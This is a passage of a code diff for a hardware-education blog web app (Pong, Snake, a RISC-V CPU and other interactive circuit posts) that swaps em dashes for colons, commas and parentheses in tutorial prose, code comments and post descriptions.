           stored weight multiplies whatever data arrives.
         </p>

--- a/apps/web/src/features/blog/how-tpus-work/useSystolicSimulator.ts
+++ b/apps/web/src/features/blog/how-tpus-work/useSystolicSimulator.ts
@@ -20,7 +20,7 @@ export function useSystolicSimulator() {
   }, [sim.circuit]);
 
   // Monitor the circuit's formal `done` output port (was previously a
-  // substring scan over portValues looking for a node named "done_led" —
+  // substring scan over portValues looking for a node named "done_led",
   // replaced with a declared top-level port).
   useEffect(() => {
     const done = sim.portValues?.get('__top__.done');

--- a/apps/web/src/features/blog/pong-in-hardware/PongDemo.tsx
+++ b/apps/web/src/features/blog/pong-in-hardware/PongDemo.tsx
@@ -114,7 +114,7 @@ export function PongDemo() {
 
   return (
     <div className="rounded-xl border border-gray-700/50 bg-gray-100 dark:bg-gray-900/80 overflow-hidden">
-      {/* Keyboard instructions — hidden on mobile */}
+      {/* Keyboard instructions, hidden on mobile */}
       <div className="hidden sm:flex px-4 py-3 border-b border-gray-700/50 items-center gap-3">
         <span className="text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
           Controls
@@ -161,7 +161,7 @@ export function PongDemo() {
         </svg>
       </div>
 
-      {/* Touch controls — mobile only */}
+      {/* Touch controls, mobile only */}
       <div className="sm:hidden flex justify-around py-4 border-t border-gray-700/50 bg-gray-100 dark:bg-gray-900/90">
         <PaddlePad label="Left" upCode={17} downCode={31} onDirection={sendLeftDirection} />
         <PaddlePad label="Right" upCode={72} downCode={80} onDirection={sendRightDirection} />

--- a/apps/web/src/features/blog/pong-in-hardware/circuits.ts
+++ b/apps/web/src/features/blog/pong-in-hardware/circuits.ts
@@ -307,7 +307,7 @@ export const PONG_CIRCUITS: Record<string, BlogCircuit> = {
   pixelAddress: {
     name: 'Pixel Address Calculation',
     description:
-      'Converts (X, Y) coordinates to a linear framebuffer address using (Y << 4) + X. In real hardware a left shift by 4 is just wiring — each bit of Y connects to a position 4 places higher — so the only real gate is the final adder.',
+      'Converts (X, Y) coordinates to a linear framebuffer address using (Y << 4) + X. In real hardware a left shift by 4 is just wiring (each bit of Y connects to a position 4 places higher), so the only real gate is the final adder.',
     layout: {
       x: { x: 0, y: 120 },
       y: { x: 0, y: 0 },
@@ -321,7 +321,7 @@ export const PONG_CIRCUITS: Record<string, BlogCircuit> = {
 };
 
 /**
- * Full PongSimple — a complete Pong game on a 16x16 screen.
+ * Full PongSimple: a complete Pong game on a 16x16 screen.
  * Two paddles (W/S and Up/Down), a bouncing ball, 14-phase rendering pipeline.
  */
 export const PongSimple = circuit('PongSimple', {

--- a/apps/web/src/features/blog/pong-in-hardware/sections/AddressSection.tsx
+++ b/apps/web/src/features/blog/pong-in-hardware/sections/AddressSection.tsx
@@ -14,14 +14,14 @@ export function AddressSection() {
           The screen&rsquo;s DualPortRAM stores 256 pixels in a flat array. To draw at position (X,
           Y) we need the linear address Y &times; 16 + X. Multiplying by 16 is the same as shifting
           left by 4 bits, and in real hardware a left shift costs{' '}
-          <strong className="text-gray-900 dark:text-white">zero gates</strong> &mdash; it&rsquo;s
-          just <em>wiring</em>. Each bit of Y connects to a position four places higher in the
-          output, with the low four bits tied to zero. The only actual logic gate is the final adder
-          that adds X.
+          <strong className="text-gray-900 dark:text-white">zero gates</strong>. It&rsquo;s just{' '}
+          <em>wiring</em>. Each bit of Y connects to a position four places higher in the output,
+          with the low four bits tied to zero. The only actual logic gate is the final adder that
+          adds X.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Change <strong>x</strong> and <strong>y</strong> to see the address update instantly
-          &mdash; this is pure combinational logic with zero clock cycles.
+          Change <strong>x</strong> and <strong>y</strong> to see the address update instantly,
+          because this is pure combinational logic with zero clock cycles.
         </p>
       </div>
 

--- a/apps/web/src/features/blog/pong-in-hardware/sections/BallSection.tsx
+++ b/apps/web/src/features/blog/pong-in-hardware/sections/BallSection.tsx
@@ -9,10 +9,10 @@ export function BallSection() {
       <h2 className="text-3xl font-bold text-gray-900 dark:text-white mb-4">A Moving Ball</h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          The ball&rsquo;s position is stored in two <code>Register</code> components &mdash; one
-          for X and one for Y. Each clock tick, an <code>Adder</code> adds a velocity delta (dx, dy)
-          to the current position. A <code>BitSlice</code> wraps the result to the 0&ndash;15 range
-          so the ball stays on our 16&times;16 screen.
+          The ball&rsquo;s position is stored in two <code>Register</code> components, one for X and
+          one for Y. Each clock tick, an <code>Adder</code> adds a velocity delta (dx, dy) to the
+          current position. A <code>BitSlice</code> wraps the result to the 0&ndash;15 range so the
+          ball stays on our 16&times;16 screen.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Toggle the <strong>enable</strong> switch, then click <strong>Tick</strong> to watch the

--- a/apps/web/src/features/blog/pong-in-hardware/sections/HeroSection.tsx
+++ b/apps/web/src/features/blog/pong-in-hardware/sections/HeroSection.tsx
@@ -6,9 +6,9 @@ export function HeroSection() {
           Pong in Hardware
         </h1>
         <p className="mt-6 text-xl text-gray-500 dark:text-gray-300 leading-relaxed">
-          Two paddles, a bouncing ball, and a 14-phase rendering pipeline &mdash; all built from
-          logic gates, registers, and memory. No CPU runs this game. Every decision is wired
-          directly into the circuit.
+          Two paddles, a bouncing ball, and a 14-phase rendering pipeline, all built from logic
+          gates, registers, and memory. No CPU runs this game. Every decision is wired directly into
+          the circuit.
         </p>
         <div className="mt-8 flex items-center gap-4 text-sm text-gray-500 dark:text-gray-400">
           <span>Interactive tutorial</span>

--- a/apps/web/src/features/blog/pong-in-hardware/sections/PongSection.tsx
+++ b/apps/web/src/features/blog/pong-in-hardware/sections/PongSection.tsx
@@ -19,11 +19,10 @@ export function PongSection() {
     <section className="py-12">
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          This is a complete Pong game running on a 16&times;16 screen &mdash; no CPU, no software,
-          just digital circuits. Click{' '}
-          <strong className="text-gray-900 dark:text-white">Run</strong> and use <kbd>W</kbd>/
-          <kbd>S</kbd> for the left paddle and <kbd>&uarr;</kbd>/<kbd>&darr;</kbd> for the right.
-          Scroll down to see how each piece works.
+          This is a complete Pong game running on a 16&times;16 screen: no CPU, no software, just
+          digital circuits. Click <strong className="text-gray-900 dark:text-white">Run</strong> and
+          use <kbd>W</kbd>/<kbd>S</kbd> for the left paddle and <kbd>&uarr;</kbd>/<kbd>&darr;</kbd>{' '}
+          for the right. Scroll down to see how each piece works.
         </p>
       </div>
 
@@ -39,8 +38,8 @@ export function PongSection() {
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           There is no software executing instructions here. The keyboard scan codes flow through
           comparators, the mux trees select deltas, the adders compute new positions, and the phase
-          counter orchestrates memory writes &mdash; all in parallel combinational logic, driven
-          forward by the clock.
+          counter orchestrates memory writes, all in parallel combinational logic, driven forward by
+          the clock.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           This is the same principle behind dedicated hardware accelerators: instead of a

--- a/apps/web/src/features/blog/pong-in-hardware/usePongSimulator.ts
+++ b/apps/web/src/features/blog/pong-in-hardware/usePongSimulator.ts
@@ -52,7 +52,7 @@ export function usePongSimulator() {
     [nodeIds, sim.setNodeValue],
   );
 
-  // Keyboard listener — W/S drive the left paddle, arrows the right
+  // Keyboard listener: W/S drive the left paddle, arrows the right
   useEffect(() => {
     if (!sim.ready) return;
 
@@ -100,7 +100,7 @@ export function usePongSimulator() {
     };
   }, [sim.ready, sendLeftDirection, sendRightDirection]);
 
-  // Auto-run interval — run a complete 14-phase game frame each time.
+  // Auto-run interval: run a complete 14-phase game frame each time.
   // Speed controls how often frames run (higher = slower ball + paddles).
   // tickN batches all 14 cycles into one sandbox round-trip and one React
   // update, so React renders only at end-of-frame (no mid-cycle flicker).

--- a/apps/web/src/features/blog/posts.ts
+++ b/apps/web/src/features/blog/posts.ts
@@ -28,7 +28,7 @@ export const posts: BlogPost[] = [
     slug: 'synth-in-hardware',
     title: 'A Synthesiser Made of Logic Gates',
     description:
-      'A 16-bit counter, a table of numbers and one multiplier. Every sample is computed by a circuit you can open up — and the same netlist runs on an FPGA.',
+      'A 16-bit counter, a table of numbers and one multiplier. Every sample is computed by a circuit you can open up, and the same netlist runs on an FPGA.',
     category: 'interactive',
     nodes: '16 nodes',
   },
@@ -36,7 +36,7 @@ export const posts: BlogPost[] = [
     slug: 'pong-in-hardware',
     title: 'Pong in Hardware',
     description:
-      'A complete Pong game built from logic gates, registers, and memory — two paddles, a bouncing ball, and a 14-phase rendering pipeline, all without a CPU.',
+      'A complete Pong game built from logic gates, registers, and memory. Two paddles, a bouncing ball, and a 14-phase rendering pipeline, all without a CPU.',
     category: 'game',
     nodes: '~80 nodes',
   },
@@ -44,7 +44,7 @@ export const posts: BlogPost[] = [
     slug: 'snake-in-hardware',
     title: 'Snake in Hardware',
     description:
-      'A complete Snake game built entirely from logic gates, registers, and memory — no CPU, no software, just digital circuits.',
+      'A complete Snake game built entirely from logic gates, registers, and memory. No CPU, no software, just digital circuits.',
     category: 'game',
     nodes: '~100 nodes',
   },
@@ -52,7 +52,7 @@ export const posts: BlogPost[] = [
     slug: 'building-a-cpu',
     title: 'Building a CPU from Scratch',
     description:
-      'From NAND gates to a working processor — fetch, decode, execute, all built from logic gates you can click.',
+      'From NAND gates to a working processor: fetch, decode, execute, all built from logic gates you can click.',
     category: 'cpu',
     nodes: '~300 nodes',
   },
@@ -68,7 +68,7 @@ export const posts: BlogPost[] = [
     slug: 'computing-trig-in-hardware',
     title: 'Computing Trig in Hardware',
     description:
-      'How calculators and GPUs compute sine and cosine using only bit shifts and addition — the CORDIC algorithm, built from logic gates.',
+      'How calculators and GPUs compute sine and cosine using only bit shifts and addition. The CORDIC algorithm, built from logic gates.',
     category: 'accelerator',
     nodes: '~40 nodes',
   },
@@ -76,7 +76,7 @@ export const posts: BlogPost[] = [
     slug: 'sorting-networks',
     title: 'Sorting Networks',
     description:
-      'A fixed wiring of comparators that sorts any input in the same number of steps — no branches, no loops. The algorithm behind network switch fabrics, GPU sort, and median filters.',
+      'A fixed wiring of comparators that sorts any input in the same number of steps, with no branches and no loops. The algorithm behind network switch fabrics, GPU sort, and median filters.',
     category: 'accelerator',
     nodes: '~25 nodes',
   },
@@ -84,7 +84,7 @@ export const posts: BlogPost[] = [
     slug: 'how-network-switches-work',
     title: 'How Network Switches Work',
     description:
-      'Packet buffering, MAC address lookup, and forwarding — built from the same primitives as everything else.',
+      'Packet buffering, MAC address lookup, and forwarding, all built from the same primitives as everything else.',
     category: 'networking',
     nodes: '~50 nodes',
   },
@@ -92,7 +92,7 @@ export const posts: BlogPost[] = [
     slug: 'breakout-in-hardware',
     title: 'Breakout in Hardware',
     description:
-      'A classic brick-breaking game built entirely from logic gates — ball physics, paddle control, brick collision detection, and score tracking, all without a CPU.',
+      'A classic brick-breaking game built entirely from logic gates: ball physics, paddle control, brick collision detection, and score tracking, all without a CPU.',
     category: 'game',
     nodes: '~90 nodes',
   },
@@ -100,7 +100,7 @@ export const posts: BlogPost[] = [
     slug: 'aes-in-hardware',
     title: 'AES in Hardware',
     description:
-      "Why Intel built AES into the CPU. SubBytes, XTime, and MixColumns — the operations behind the world's most deployed cipher, verified against FIPS 197.",
+      "Why Intel built AES into the CPU. SubBytes, XTime, and MixColumns are the operations behind the world's most deployed cipher, verified against FIPS 197.",
     category: 'accelerator',
     nodes: '~60 nodes',
   },
@@ -116,7 +116,7 @@ export const posts: BlogPost[] = [
     slug: 'crc32-in-hardware',
     title: 'CRC-32 in Hardware',
     description:
-      'The checksum at the end of every Ethernet frame and ZIP file — a 32-bit shift register with XOR feedback, running in the NIC on your machine right now.',
+      'The checksum at the end of every Ethernet frame and ZIP file: a 32-bit shift register with XOR feedback, running in the NIC on your machine right now.',
     category: 'networking',
     nodes: '~15 nodes',
   },
@@ -124,7 +124,7 @@ export const posts: BlogPost[] = [
     slug: 'rv32i-cpu',
     title: 'A RISC-V CPU That Runs C',
     description:
-      'A 5-stage pipelined RISC-V processor with data forwarding and hazard detection — write C, compile it, and step through execution cycle by cycle.',
+      'A 5-stage pipelined RISC-V processor with data forwarding and hazard detection. Write C, compile it, and step through execution cycle by cycle.',
     category: 'cpu',
     nodes: '~200 nodes',
   },

--- a/apps/web/src/features/blog/rv32i-cpu/sections/ConformanceSection.tsx
+++ b/apps/web/src/features/blog/rv32i-cpu/sections/ConformanceSection.tsx
@@ -7,9 +7,9 @@ export function ConformanceSection() {
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           &ldquo;It runs my C program&rdquo; is a weak claim. A CPU can run a lot of code correctly
-          and still get an edge case wrong &mdash; a shift by 32, a signed comparison at the
-          boundary, a branch offset that wraps. The industry answer to that is a conformance suite,
-          so we ran one.
+          and still get an edge case wrong: a shift by 32, a signed comparison at the boundary, a
+          branch offset that wraps. The industry answer to that is a conformance suite, so we ran
+          one.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The core passes all 38 of the official{' '}
@@ -31,8 +31,8 @@ export function ConformanceSection() {
             Spike
           </a>
           , the reference RISC-V simulator. What gets tested is the elaborated gate-level netlist
-          &mdash; the same circuit shown above, flattened to primitives &mdash; not a behavioural
-          model written alongside it. The core needed no changes to pass.
+          (the same circuit shown above, flattened to primitives), not a behavioural model written
+          alongside it. The core needed no changes to pass.
         </p>
         <pre className="overflow-x-auto rounded-lg border border-gray-200 dark:border-gray-800 bg-gray-100 dark:bg-gray-900 p-4 text-sm text-gray-800 dark:text-gray-200">
           <code>38/38 attempted pass vs Spike · 38/38 trap-free (pure RV32I) · 0 skipped</code>
@@ -44,8 +44,8 @@ export function ConformanceSection() {
           formality.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Two honest limits: this is simulation, not silicon &mdash; the suite has not been run on
-          the FPGA &mdash; and passing arch-test is not the same as being certified.
+          Two honest limits: this is simulation, not silicon (the suite has not been run on the
+          FPGA), and passing arch-test is not the same as being certified.
         </p>
       </div>
 

--- a/apps/web/src/features/blog/rv32i-cpu/sections/HazardsSection.tsx
+++ b/apps/web/src/features/blog/rv32i-cpu/sections/HazardsSection.tsx
@@ -55,8 +55,8 @@ export function HazardsSection() {
             <p className="text-sm text-gray-500 dark:text-gray-400">
               Freeze the pipeline for a cycle until the result is available. Simple but wastes a
               cycle. Our hazard unit does this for{' '}
-              <strong className="text-gray-600 dark:text-gray-300">load-use</strong> hazards &mdash;
-              when a value is being loaded from memory, it&rsquo;s not ready until the Memory stage
+              <strong className="text-gray-600 dark:text-gray-300">load-use</strong> hazards: when a
+              value is being loaded from memory, it&rsquo;s not ready until the Memory stage
               completes.
             </p>
           </div>
@@ -67,7 +67,7 @@ export function HazardsSection() {
               Don&rsquo;t wait for writeback. Grab the result directly from whichever stage computed
               it and feed it back to the Execute stage through a{' '}
               <strong className="text-gray-600 dark:text-gray-300">forwarding mux</strong>. No stall
-              needed &mdash; the pipeline keeps flowing.
+              needed, and the pipeline keeps flowing.
             </p>
           </div>
         </div>
@@ -75,8 +75,8 @@ export function HazardsSection() {
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           <strong className="text-gray-900 dark:text-white">Control hazards</strong> are the other
           problem. When a branch is taken, the instructions that were already fetched after it are
-          wrong. The pipeline flushes them &mdash; replaces them with NOPs &mdash; and restarts from
-          the branch target. That&rsquo;s what the flush input on the pipeline registers does.
+          wrong. The pipeline flushes them, replacing them with NOPs, and restarts from the branch
+          target. That&rsquo;s what the flush input on the pipeline registers does.
         </p>
       </div>
 

--- a/apps/web/src/features/blog/rv32i-cpu/sections/HeroSection.tsx
+++ b/apps/web/src/features/blog/rv32i-cpu/sections/HeroSection.tsx
@@ -7,8 +7,8 @@ export function HeroSection() {
         </h1>
         <p className="mt-6 text-xl text-gray-500 dark:text-gray-300 leading-relaxed">
           A 5-stage pipelined processor, simulated in your browser. Write C, compile it with GCC,
-          and watch every instruction flow through fetch, decode, execute, memory, and writeback
-          &mdash; one clock cycle at a time.
+          and watch every instruction flow through fetch, decode, execute, memory, and writeback,
+          one clock cycle at a time.
         </p>
         <div className="mt-8 flex items-center gap-4 text-sm text-gray-500 dark:text-gray-400">
           <span>Interactive tutorial</span>

--- a/apps/web/src/features/blog/rv32i-cpu/sections/PipelineSection.tsx
+++ b/apps/web/src/features/blog/rv32i-cpu/sections/PipelineSection.tsx
@@ -18,14 +18,14 @@ const STAGES = [
     description:
       'The 32-bit instruction is split apart: opcode, source registers, destination register, immediate value, and function codes. The register file reads out the source values.',
     detail:
-      'This is where the CPU figures out what operation to perform. A RISC-V instruction packs all of this into a fixed 32-bit format — the decode logic is just wire slicing.',
+      'This is where the CPU figures out what operation to perform. A RISC-V instruction packs all of this into a fixed 32-bit format, so the decode logic is just wire slicing.',
   },
   {
     name: 'Execute',
     color: 'cyan',
     abbr: 'EX',
     description:
-      'The ALU performs the operation — add, subtract, shift, compare, or compute a branch target address. This is where the actual computation happens.',
+      'The ALU performs the operation: add, subtract, shift, compare, or compute a branch target address. This is where the actual computation happens.',
     detail:
       "The forwarding unit also lives here. If the previous instruction's result hasn't been written back yet, the forwarding mux grabs it directly instead of reading a stale value from the register file.",
   },
@@ -43,7 +43,7 @@ const STAGES = [
     color: 'green',
     abbr: 'WB',
     description:
-      'The result — whether from the ALU or a memory load — is written back to the destination register in the register file. The instruction is now complete.',
+      'The result, whether from the ALU or a memory load, is written back to the destination register in the register file. The instruction is now complete.',
     detail:
       'Five stages means five instructions are in flight simultaneously. While one instruction writes back, the next is accessing memory, the next is computing, the next is decoding, and the next is being fetched.',
   },
@@ -73,10 +73,9 @@ export function PipelineSection() {
       </h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          A single-cycle CPU executes one instruction per clock cycle &mdash; fetch, decode,
-          execute, memory, writeback, all at once. Simple, but slow. The clock can only tick as fast
-          as the <strong className="text-gray-900 dark:text-white">slowest instruction</strong>{' '}
-          allows.
+          A single-cycle CPU executes one instruction per clock cycle: fetch, decode, execute,
+          memory, writeback, all at once. Simple, but slow. The clock can only tick as fast as the{' '}
+          <strong className="text-gray-900 dark:text-white">slowest instruction</strong> allows.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           A pipelined CPU splits execution into{' '}
@@ -124,7 +123,7 @@ export function PipelineSection() {
         </h3>
         <p className="text-sm text-gray-500 dark:text-gray-400 mb-3">
           The simplest piece of the pipeline: a register that counts up by 4 each cycle. Toggle the
-          stall switch to freeze it &mdash; that&rsquo;s what happens when a hazard is detected.
+          stall switch to freeze it, which is what happens when a hazard is detected.
         </p>
         <p className="text-sm text-gray-500 dark:text-gray-400 mb-3">
           In the full CPU, the PC doesn&rsquo;t always increment by 4. A mux selects between three
@@ -169,7 +168,7 @@ export function PipelineSection() {
         <p className="text-sm text-gray-500 dark:text-gray-400 mb-3">
           Between every stage sits a pipeline register. It latches the output of one stage on the
           clock edge, holding it stable for the next stage to read. The flush input zeros the
-          register &mdash; used when a branch is taken and the partially-fetched instruction must be
+          register, used when a branch is taken and the partially-fetched instruction must be
           discarded.
         </p>
         <CircuitEmbed

--- a/apps/web/src/features/blog/rv32i-cpu/sections/RunningCodeSection.tsx
+++ b/apps/web/src/features/blog/rv32i-cpu/sections/RunningCodeSection.tsx
@@ -12,18 +12,18 @@ export function RunningCodeSection() {
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           That&rsquo;s the whole CPU. A program counter, a decoder, an ALU, memory, a register file,
           pipeline registers between each stage, and forwarding/hazard logic to keep it all correct.
-          Around 600 lines of circuit description &mdash; registers, muxes, and functional blocks
-          wired together structurally, like a real hardware design.
+          Around 600 lines of circuit description: registers, muxes, and functional blocks wired
+          together structurally, like a real hardware design.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Below is the complete board &mdash; CPU chip, instruction ROM, data RAM, memory bus, and
-          UART &mdash; just like a real PCB. Click the{' '}
+          Below is the complete board (CPU chip, instruction ROM, data RAM, memory bus, and UART),
+          just like a real PCB. Click the{' '}
           <strong className="text-gray-900 dark:text-white">Code</strong> button on the ROM node to
           write C, Rust, or Assembly. The compiler produces a RISC-V binary that loads directly into
           the ROM. Then step the clock and watch your code execute through the 5-stage pipeline.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          Double-click the CPU to drill into its internals &mdash; you&rsquo;ll see every pipeline
+          Double-click the CPU to drill into its internals, and you&rsquo;ll see every pipeline
           register, every forwarding mux, every hazard signal. Toggle switches, inspect values,
           rewind time. It&rsquo;s the same circuit, all the way down.
         </p>

--- a/apps/web/src/features/blog/rv32i-cpu/sections/TryItSection.tsx
+++ b/apps/web/src/features/blog/rv32i-cpu/sections/TryItSection.tsx
@@ -4,8 +4,8 @@ export function TryItSection() {
       <h2 className="text-3xl font-bold text-gray-900 dark:text-white mb-4">Things to Try</h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          The debugger above isn&rsquo;t a recording &mdash; it&rsquo;s a live simulation. Here are
-          some experiments that reveal how the pipeline actually works:
+          The debugger above isn&rsquo;t a recording. It&rsquo;s a live simulation. Here are some
+          experiments that reveal how the pipeline actually works:
         </p>
       </div>
 
@@ -16,8 +16,8 @@ export function TryItSection() {
           </h3>
           <p className="text-sm text-gray-500 dark:text-gray-400 leading-relaxed">
             Write two instructions where the second uses the result of the first. Step through and
-            watch the forwarding mux kick in &mdash; the EX or MEM result gets bypassed directly
-            instead of waiting for writeback.
+            watch the forwarding mux kick in: the EX or MEM result gets bypassed directly instead of
+            waiting for writeback.
           </p>
           <pre className="mt-3 rounded-lg bg-gray-100 dark:bg-gray-900 border border-gray-200 dark:border-gray-800 p-3 font-mono text-xs text-gray-500 dark:text-gray-300">
             {`int x = 5;
@@ -34,8 +34,8 @@ int y = x + 3; // needs x immediately`}
             <code className="text-gray-900 dark:text-white bg-gray-200 dark:bg-gray-800 px-1 py-0.5 rounded text-xs">
               if
             </code>{' '}
-            statement. When the branch is taken, watch the pipeline badges &mdash; instructions that
-            were already fetched get flushed and replaced with NOPs.
+            statement. When the branch is taken, watch the pipeline badges: instructions that were
+            already fetched get flushed and replaced with NOPs.
           </p>
           <pre className="mt-3 rounded-lg bg-gray-100 dark:bg-gray-900 border border-gray-200 dark:border-gray-800 p-3 font-mono text-xs text-gray-500 dark:text-gray-300">
             {`int x = 10;
@@ -64,9 +64,9 @@ int result = (3 + 4) * 2;`}
             4. Try a different language
           </h3>
           <p className="text-sm text-gray-500 dark:text-gray-400 leading-relaxed">
-            Switch to Rust and compile the same Fibonacci. The disassembly will look different
-            &mdash; different compilers make different choices &mdash; but the pipeline
-            doesn&rsquo;t care. Same stages, same forwarding, same hazards.
+            Switch to Rust and compile the same Fibonacci. The disassembly will look different,
+            because different compilers make different choices, but the pipeline doesn&rsquo;t care.
+            Same stages, same forwarding, same hazards.
           </p>
         </div>
       </div>

--- a/apps/web/src/features/blog/rv32i-cpu/sections/WhyRiscVSection.tsx
+++ b/apps/web/src/features/blog/rv32i-cpu/sections/WhyRiscVSection.tsx
@@ -6,9 +6,9 @@ export function WhyRiscVSection() {
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Most CPUs are black boxes. You write code, it runs, and somewhere inside a billion
           transistors do&hellip; something. RISC-V changes that. It&rsquo;s an{' '}
-          <strong className="text-gray-900 dark:text-white">open instruction set</strong> &mdash;
-          anyone can read the spec, build a processor, and understand exactly what happens when your
-          code executes.
+          <strong className="text-gray-900 dark:text-white">open instruction set</strong>: anyone
+          can read the spec, build a processor, and understand exactly what happens when your code
+          executes.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The base integer instruction set,{' '}
@@ -19,8 +19,8 @@ export function WhyRiscVSection() {
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The CPU on this page implements all of RV32I using a{' '}
-          <strong className="text-gray-900 dark:text-white">classic 5-stage pipeline</strong>{' '}
-          &mdash; the same architecture used in{' '}
+          <strong className="text-gray-900 dark:text-white">classic 5-stage pipeline</strong>, the
+          same architecture used in{' '}
           <a
             href="https://www.sifive.com/cores/e31"
             target="_blank"
@@ -42,17 +42,17 @@ export function WhyRiscVSection() {
           <li className="flex gap-2">
             <span className="text-gray-600 shrink-0">&bull;</span>
             <span>
-              <strong className="text-gray-600 dark:text-gray-300">No branch predictor</strong>{' '}
-              &mdash; we always flush on taken branches. A real core would predict branch outcomes
-              to avoid the penalty.
+              <strong className="text-gray-600 dark:text-gray-300">No branch predictor</strong>: we
+              always flush on taken branches. A real core would predict branch outcomes to avoid the
+              penalty.
             </span>
           </li>
           <li className="flex gap-2">
             <span className="text-gray-600 shrink-0">&bull;</span>
             <span>
-              <strong className="text-gray-600 dark:text-gray-300">No caches</strong> &mdash; we
-              access memory directly. A production CPU would have L1 instruction and data caches to
-              hide memory latency.
+              <strong className="text-gray-600 dark:text-gray-300">No caches</strong>: we access
+              memory directly. A production CPU would have L1 instruction and data caches to hide
+              memory latency.
             </span>
           </li>
           <li className="flex gap-2">
@@ -60,22 +60,22 @@ export function WhyRiscVSection() {
             <span>
               <strong className="text-gray-600 dark:text-gray-300">
                 No interrupts or exceptions
-              </strong>{' '}
-              &mdash; real cores need these for I/O, timers, and error handling.
+              </strong>
+              : real cores need these for I/O, timers, and error handling.
             </span>
           </li>
           <li className="flex gap-2">
             <span className="text-gray-600 shrink-0">&bull;</span>
             <span>
-              <strong className="text-gray-600 dark:text-gray-300">No CSRs</strong> &mdash; control
-              and status registers for privilege levels, counters, and configuration.
+              <strong className="text-gray-600 dark:text-gray-300">No CSRs</strong>: control and
+              status registers for privilege levels, counters, and configuration.
             </span>
           </li>
         </ul>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Each of these could be added as an extension to the existing pipeline. The 5-stage
-          structure doesn&rsquo;t change &mdash; branch prediction adds logic to the Fetch stage,
-          caches sit in front of memory, and interrupts add a new control path into Decode.
+          structure doesn&rsquo;t change. Branch prediction adds logic to the Fetch stage, caches
+          sit in front of memory, and interrupts add a new control path into Decode.
         </p>
       </div>
     </section>

--- a/apps/web/src/features/blog/snake-in-hardware/SnakeDemo.tsx
+++ b/apps/web/src/features/blog/snake-in-hardware/SnakeDemo.tsx
@@ -80,7 +80,7 @@ export function SnakeDemo() {
 
   return (
     <div className="rounded-xl border border-gray-700/50 bg-gray-100 dark:bg-gray-900/80 overflow-hidden">
-      {/* Keyboard instructions — hidden on mobile */}
+      {/* Keyboard instructions, hidden on mobile */}
       <div className="hidden sm:flex px-4 py-3 border-b border-gray-700/50 items-center gap-3">
         <span className="text-xs font-medium text-gray-500 dark:text-gray-400 uppercase tracking-wider">
           Controls
@@ -100,7 +100,7 @@ export function SnakeDemo() {
         </div>
       </div>
 
-      {/* Game screen — responsive 8×8 pixel grid */}
+      {/* Game screen: responsive 8×8 pixel grid */}
       <div className="flex justify-center py-6 sm:py-8 bg-gray-50 dark:bg-gray-950">
         <svg
           viewBox={`0 0 ${TOTAL_SIZE} ${TOTAL_SIZE}`}
@@ -125,7 +125,7 @@ export function SnakeDemo() {
         </svg>
       </div>
 
-      {/* Touch d-pad — mobile only */}
+      {/* Touch d-pad, mobile only */}
       <div className="sm:hidden py-4 border-t border-gray-700/50 bg-gray-100 dark:bg-gray-900/90">
         <DPad onDirection={sendDirection} />
       </div>

--- a/apps/web/src/features/blog/snake-in-hardware/circuits.ts
+++ b/apps/web/src/features/blog/snake-in-hardware/circuits.ts
@@ -325,7 +325,7 @@ const CollisionDetector = circuit('CollisionDetector', {
 });
 
 // The full Snake game circuit is the canonical, hardware-verified copy from
-// @simten/core/examples — the same circuit the ULX3S FPGA project synthesizes.
+// @simten/core/examples, the same circuit the ULX3S FPGA project synthesizes.
 // Drift between the copies in this repo is pinned by
 // hardware/ulx3s/projects/snake/parity-check.ts.
 export { Snake } from '@simten/core/examples';
@@ -352,7 +352,7 @@ export const SNAKE_CIRCUITS: Record<string, BlogCircuit> = {
   coordToPixel: {
     name: 'Coordinate to Pixel Address',
     description:
-      'Converts (X, Y) coordinates to a linear pixel address using (Y << 3) + X. A left shift by 3 is just wiring in real hardware — zero gates.',
+      'Converts (X, Y) coordinates to a linear pixel address using (Y << 3) + X. A left shift by 3 is just wiring in real hardware, costing zero gates.',
     circuit: CoordToPixel,
     layout: {
       x: { x: 0, y: 0 },

--- a/apps/web/src/features/blog/snake-in-hardware/sections/HeroSection.tsx
+++ b/apps/web/src/features/blog/snake-in-hardware/sections/HeroSection.tsx
@@ -9,7 +9,7 @@ export function HeroSection() {
       <h1 className="text-4xl md:text-5xl font-bold tracking-tight text-gray-900 dark:text-white leading-tight mb-2">
         Snake in Hardware
       </h1>
-      {/* Playable Snake — immediately after the title */}
+      {/* Playable Snake, immediately after the title */}
       <ClientOnly>
         <Suspense
           fallback={

--- a/apps/web/src/features/blog/snake-in-hardware/useSnakeSimulator.ts
+++ b/apps/web/src/features/blog/snake-in-hardware/useSnakeSimulator.ts
@@ -22,7 +22,7 @@ export function useSnakeSimulator() {
     };
   }, [sim.cycleCount, sim.ready, sim.scanPort]);
 
-  // Keyboard handling — single setNode call, no race window with ticks
+  // Keyboard handling: single setNode call, no race window with ticks
   useEffect(() => {
     const handleKeyDown = (e: KeyboardEvent) => {
       // 2-bit direction encoding: 0=up, 1=right, 2=down, 3=left

--- a/apps/web/src/features/blog/sorting-networks/circuits.ts
+++ b/apps/web/src/features/blog/sorting-networks/circuits.ts
